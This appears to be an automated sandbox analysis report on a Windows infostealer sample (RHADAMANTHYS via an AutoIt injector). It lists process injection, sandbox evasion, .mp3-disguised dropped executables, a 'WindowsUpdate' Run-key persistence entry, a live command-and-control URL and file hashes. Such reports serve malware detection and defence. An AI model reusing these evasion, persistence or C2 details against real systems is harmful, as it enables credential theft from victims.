                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Procmon.exe
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_81
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_XP
                Source: qwlvpmrupf.mp3.exe, 00000013.00000000.2185210747.0000000000E53000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_XPe
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_VISTA
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_7
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara matchFile source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003F2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_003F2163
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003F1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,7_2_003F1B61
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A49B4B socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,15_2_05A49B4B
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E12163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00E12163
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E11B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00E11B61
                Mitre Att&ck Matrix (numbers in parentheses are the report's match counts for that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Scripting (1) | Valid Accounts (2) | Windows Management Instrumentation (11) | Scripting (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (11) | Input Capture (41) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
                Credentials | Domains | Default Accounts | Native API (12) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (41) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Valid Accounts (2) | Valid Accounts (2) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Registry Run Keys / Startup Folder (1) | Access Token Manipulation (21) | Software Packing (1) | NTDS | System Information Discovery (138) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (312) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (351) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (1) | Masquerading (11) | Cached Domain Credentials | Virtualization/Sandbox Evasion (131) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (2) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (131) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (21) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (312) | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1560167, Sample: ngPebbPhbp.exe, Startdate: 21/11/2024, Architecture: WINDOWS, Score: 100

                Graph nodes and edges (node id, label, edge):
                72 Multi AV Scanner detection for submitted file 2->72
                74 Yara detected Autoit Injector 2->74
                76 Yara detected RHADAMANTHYS Stealer 2->76
                78 9 other signatures 2->78
                10 ngPebbPhbp.exe 3 29 2->10 started
                14 qwlvpmrupf.mp3.exe 1 2 2->14 started
                16 qwlvpmrupf.mp3.exe 2->16 started
                18 qwlvpmrupf.mp3.exe 2->18 started
                64 C:\Users\user\AppData\...\qwlvpmrupf.mp3, PE32 10->64 dropped
                66 C:\Users\user\AppData\Local\Temp\...\rmxb.vbe, Unicode 10->66 dropped
                94 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->94
                20 wscript.exe 1 10->20 started
                68 C:\Users\user\...\qwlvpmrupf.mp3.exe.exe, PE32 14->68 dropped
                96 Found API chain indicative of sandbox detection 14->96
                98 Writes to foreign memory regions 14->98
                100 Allocates memory in foreign processes 14->100
                23 RegSvcs.exe 14->23 started
                102 Injects a PE file into a foreign processes 16->102
                25 RegSvcs.exe 16->25 started
                27 RegSvcs.exe 18->27 started
                80 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->80
                29 cmd.exe 1 20->29 started
                31 cmd.exe 1 20->31 started
                34 cmd.exe 1 20->34 started
                36 qwlvpmrupf.mp3 1 27 29->36 started
                40 conhost.exe 29->40 started
                104 Uses ipconfig to lookup or modify the Windows network settings 31->104
                42 conhost.exe 31->42 started
                44 ipconfig.exe 1 31->44 started
                46 conhost.exe 34->46 started
                48 ipconfig.exe 1 34->48 started
                56 C:\Users\user\AppData\...\qwlvpmrupf.mp3.exe, PE32 36->56 dropped
                58 C:\Users\user\AppData\...\qwlvpmrupf.mp3.exe, PE32 36->58 dropped
                60 C:\Users\user\AppData\...\qwlvpmrupf.mp3, PE32 36->60 dropped
                62 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 36->62 dropped
                82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->82
                84 Writes to foreign memory regions 36->84
                86 Allocates memory in foreign processes 36->86
                88 Injects a PE file into a foreign processes 36->88
                50 RegSvcs.exe 1 1 36->50 started
                52 OpenWith.exe 50->52 started
                70 51.75.171.9, 49736, 49737, 49738 OVHFR France 52->70
                90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 52->90
                92 Switches to a custom stack to bypass stack traces 52->92

                Source | Detection | Scanner | Label | Link
                ngPebbPhbp.exe | 55% | ReversingLabs | Win32.Trojan.Generic |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3.exe | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3 | 0% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | 0% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe.exe | 0% | ReversingLabs | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8( | 0% | Avira URL Cloud | safe |
                https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8 | 0% | Avira URL Cloud | safe |
                No contacted domains info
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.autoitscript.com/autoit3/J | ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2078930988.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2216834063.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000000.2185326660.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp | false | | high
                https://www.autoitscript.com/autoit3/ | ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8( | OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8 | OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    51.75.171.9 | unknown | France | 16276 | OVHFR | false
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1560167
                    Start date and time:2024-11-21 13:44:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:23
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:ngPebbPhbp.exe
                    renamed because original name is a hash value
                    Original Sample Name:5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@31/48@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 90%
                    • Number of executed functions: 179
                    • Number of non-executed functions: 218
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes were analyzed; the report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: ngPebbPhbp.exe
                    Time | Type | Description
                    07:45:13 | API Interceptor | 1x Sleep call for process: ngPebbPhbp.exe modified
                    12:45:17 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                    12:45:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                    12:45:39 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    51.75.171.9 | dDEjicKkUS.exe | malicious | RHADAMANTHYS |
                    51.75.171.9 | Xteam30.hta | malicious | RHADAMANTHYS |
                    51.75.171.9 | O239SIeyKA.exe | malicious | RHADAMANTHYS |
                          No context
                           Match | Associated Sample Name / URL | Detection | Threat Name | Context
                           OVHFR | https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com | malicious | Unknown | 213.186.33.5
                           OVHFR | https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com | malicious | Unknown | 213.186.33.5
                           OVHFR | Demande de proposition du Fondation qu#U00e9b#U00e9coise du cancer.pdf | malicious | Unknown | 66.70.227.242
                           OVHFR | AI_ChainedPackageFile.VistaSoftware.exe | malicious | PureCrypter | 167.114.47.186
                           OVHFR | AaronGiles(1).exe | malicious | PureCrypter | 167.114.47.186
                           OVHFR | 740d3a.msi | malicious | Unknown | 167.114.47.186
                           OVHFR | AI_ChainedPackageFile.VistaSoftware.exe | malicious | PureCrypter | 167.114.47.186
                           OVHFR | Reminder.exe | malicious | PureCrypter | 167.114.47.186
                           OVHFR | KEFttAEb.vbs | malicious | PureCrypter | 167.114.47.186
                           OVHFR | AaronGiles(1).exe | malicious | PureCrypter | 167.114.47.186
                          No context
                           Match | Associated Sample Name / URL | Detection | Threat Name | Context
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | FS04dlvJrq.exe | malicious | FormBook |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | M1Y6kc9FpE.exe | malicious | FormBook |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | mJIvCBk5vF.exe | malicious | FormBook |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | lcbF0sywlU.exe | malicious | FormBook |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | 1aG5DoOsAW.exe | malicious | FormBook |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Factura-2410-CFDI.bat | malicious | Unknown |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | DGFmCcZnM0.exe | malicious | FormBook |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | qZkywW6Q0b.exe | malicious | FormBook |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | AlBXxWizEX.msi | malicious | DanaBot |
                           C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | mEudzoO1bG.exe | malicious | FormBook |
                                              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):315
                                              Entropy (8bit):5.372464481033641
                                              Encrypted:false
                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTa73FKDLIP12MUAvvrs:Q3La/KDLI4MWuPTAq1KDLI4M6
                                              MD5:EBC4CD5E62FD6AA60583F3FF6A9FF095
                                              SHA1:78DD536884E05E07063D5A0089D8171A50526610
                                              SHA-256:CFC0C86537AD3B643ACDFE5B20D4A87218C0BBB5319237A8BFA7954A46E07F00
                                              SHA-512:3C83D639937CB947942B90D1EBEAD437F942E35741656D70897A7DF0CF61B68CF7F3CFB38A890F14FB774B87ACAD0C3CA8322E705C30E1C585AC7797072A7C7B
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):508
                                              Entropy (8bit):5.479727752033359
                                              Encrypted:false
                                              SSDEEP:6:8RrGdDpW9J7mwnTXTJ+VmSgRTcG7VA+UCduyBrgWDgRi8Ty8Mu2C/B2azVWmUOQ8:Aq/SRLTmgZ7VzwODJPlCbUOQH8raBPc
                                              MD5:D391F8B614A342CFF9FCBF8F4E41C934
                                              SHA1:FC045F44973B9000F63808ABD1E59C66ED6755B7
                                              SHA-256:36568784A413D46056FAC31E259C41F4429F08B1564A72CEB777CC80A0AA9F1C
                                              SHA-512:E446D6F17E9765AC260F4BD429FFE901C47C46FDFDEFBA25269A33E570E98B24469B529B815322E1D17AE3B4589ECF5561519D39D3AD65FD164AA8FCA50E62AD
                                              Malicious:false
                                              Preview:13Q6zh847S45g6A2cH4mv6Q5W144vY6AH5972d938UTIk14EI5eC1H550y7Cq0TRD695T643diC189ozNoeMqD..ComboConstants ButtonConstants..n6812ly6QM661R2U13FDXSNeD1jFG4iHq7Y5m11P8Db0mX7i2ven5Jon68h1352y93b5NS4r9g888993..BorderConstants ComboConstants..458354d8u104IpZoH294M7s4Z0DZtF926l050IX5avG2A1393kp7Y061DD02T..FileConstants FileConstants..6q4s927yPeasW75NX2gP090wT809FH21p95sDCV794v13oNY1g2p37wUi33c6r3alyp9KL1e505x1a6P6Z57R9K2395..BorderConstants UpDownConstants..5zN094t11829G6o89k..ToolbarConstants TreeViewConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):624
                                              Entropy (8bit):5.578995690653875
                                              Encrypted:false
                                              SSDEEP:6:px8jxX+dkaEJNur4UiHGVI8o/KU0L6cW2N/Aykx4SVc9m5CQFXiKUn0Htwdl7h4c:qxudC+CGVI5/KUbR2N/A75CQJjrNCgWd
                                              MD5:C3A02FE4F358078606A02B7D8C069957
                                              SHA1:4CB6FC80AC829FCDB8088CC95F6C109C719CFA5D
                                              SHA-256:D8ABE1326E449CA4D9C330A900CE393EE32101793D91E7F556D0C87E77ADBA0C
                                              SHA-512:C016DED65E5A728E3EFF1E66AE913FF81677B197B4C809A9F9E509304DC2747A581597760B0D4B79E60C03647DC3569CAE21C413152C6E4AF8B4DEDE10E8BB9D
                                              Malicious:false
                                              Preview:834DOh7Je661F2c5x2Ow20Ja7vU6NFcv5O02Ac2g0I27x85247oNwN2Zi6qTh913b97CO8B45CTs2f6P9Jl55NY2Zk7P4198N0K72908qD93JeQY9n3KRM9fI868cBg24c37a2w9..ToolTipConstants BorderConstants..9n7i1Z394y14OPSW5z977v19g556Ma3788W72Tl033r8Kc2g2csp145u9b4F1d802Vi1K5XaE6..ColorConstants StructureConstants..8362kXs3l3Kr9a6pxh7DV33..BorderConstants ComboConstants..LTz071752Mo7Q622F9jiN505B91QV82i5ZM1nQI4ThM10Kp33sQKfaS981S03NI2T404E5s4x02A1sR7ND4RW3A04vr7BJgl656706yg..ColorConstants ToolTipConstants..jb1ii7Kqv193B38S1Wq1R69h75b249507B84260hB8RocdDQh7590K1Uk0x1yj2o21Yw9c6jp4196lPD3ZdB1i75w00dGmZUhsWKnO50N70TL0..FileConstants DateTimeConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):528
                                              Entropy (8bit):5.506196921189518
                                              Encrypted:false
                                              SSDEEP:12:Df7UTwPck1UAJeu31tWxpeo2plPx2CnDcJjojWd9E:DfArk1UAIuFAI5vzr
                                              MD5:83CA8D8BAC38AF12453F9D9FF1D02916
                                              SHA1:DCC6E7AB9858EB9FF63F4CD2DD7E9B84EC694A22
                                              SHA-256:58412D427987A11C362FC7D921804F58277C3A5E4EA7CE98D4DC260E9AEB6302
                                              SHA-512:1BF89F1196B9C41E5781F118CE657AEC2194D48B0C4D15672A55093778C660E609626A9E5EA5336064590A9BD21F8FA1D9CF6F6435E866A0FACF50E438D5D3F0
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):532
                                              Entropy (8bit):5.614408649531123
                                              Encrypted:false
                                              SSDEEP:12:RV3ATUo9lbTfylFQkoQPvXXaBPx/EB+CGVRsXoGo0ciVI:6FgVPPqTSkaoRj
                                              MD5:8344337D8607EEF8BA26FC751F8E0122
                                              SHA1:2AB2AFCE50E3553637AEC0B5A65AA2E72D0CE51A
                                              SHA-256:ECB2D582D697D033A5E5BD06387DF5725AF74707C0E4B596D564BE2BDB1221A7
                                              SHA-512:DA3CAB35922C97D3D03C073F51915792278919775C9690AD95A8BD7143CD45A5B0FCBB5216ED53DFC3EEE1265BB91DDCDD875699AB23B3D95FCCC991190CAF2B
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):609
                                              Entropy (8bit):5.593001882864648
                                              Encrypted:false
                                              SSDEEP:12:zMySb9uAA0s7OThyH8QiRiYSDwHNGDJnwLo5Q0VynLv:At9uX0s7OtOxwHNcJwx0V0b
                                              MD5:73CDC398766B26D5B3FC2A732B633E80
                                              SHA1:4E8178167362C791D19B8DD90284751E6294C041
                                              SHA-256:D078345688738BC731EE73004AC6AD2670CFD6343B570FA5B7C0AB7AD30F0B48
                                              SHA-512:AB55CECF628450EE0E07591C8A6B7E1EBD6F1E1FF0C3184A14BF297C64153C8507B331A391020A5068D7C23CB55E73125E7582D204CE6F5C1E26F3EE3CD32705
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):522
                                              Entropy (8bit):5.512682217978687
                                              Encrypted:false
                                              SSDEEP:12:aaf22j3HmimBHSZxVelxyBt7hYNyWcXGbZ3cwRr:A2LhmBexcfStQyBor
